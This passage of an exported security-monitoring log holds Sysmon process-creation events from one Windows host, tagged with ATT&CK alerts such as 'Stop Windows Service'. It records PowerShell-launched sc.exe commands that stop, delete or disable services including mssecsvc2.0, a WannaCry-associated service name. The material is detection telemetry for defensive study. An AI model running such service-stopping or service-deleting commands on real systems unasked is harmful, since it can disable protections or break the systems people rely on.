mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.401053300Z"",""eventRecordID"":""3823"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.398\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-001001a23000}\r\nProcessId: 2780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.398"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-001001a23000}"",""processId"":""2780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.596",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.356 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00104ea03000} +ProcessId: 360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.359500300Z"",""eventRecordID"":""3821"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.356\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00104ea03000}\r\nProcessId: 360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.356"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00104ea03000}"",""processId"":""360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.577",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.329 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010879f3000} +ProcessId: 6920 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.333330700Z"",""eventRecordID"":""3820"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.329\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010879f3000}\r\nProcessId: 6920\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.329"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010879f3000}"",""processId"":""6920"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.516",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.248 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00100c9d3000} +ProcessId: 4248 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.251634200Z"",""eventRecordID"":""3817"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.248\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00100c9d3000}\r\nProcessId: 4248\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.248"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-00100c9d3000}"",""processId"":""4248"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.476",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.197 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010919a3000} +ProcessId: 8160 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.200716700Z"",""eventRecordID"":""3814"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.197\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010919a3000}\r\nProcessId: 8160\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.197"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010919a3000}"",""processId"":""8160"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.452",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.170 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-0010ca993000} +ProcessId: 8096 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SxS Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SxS Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.177071400Z"",""eventRecordID"":""3813"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.170\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-0010ca993000}\r\nProcessId: 8096\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SxS Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:35.170"",""processGuid"":""{df9fc3d3-b413-5ecf-0000-0010ca993000}"",""processId"":""8096"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SxS Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:03.414",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:35.140 +ProcessGuid: {df9fc3d3-b413-5ecf-0000-00101b983000} +ProcessId: 4544 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:35.143899000Z"",""eventRecordID"":""3811"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:35.140\r\nProcessGuid: {df9fc3d3-b413-5ecf-0000-00101b983000}\r\nProcessId: 4544\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John 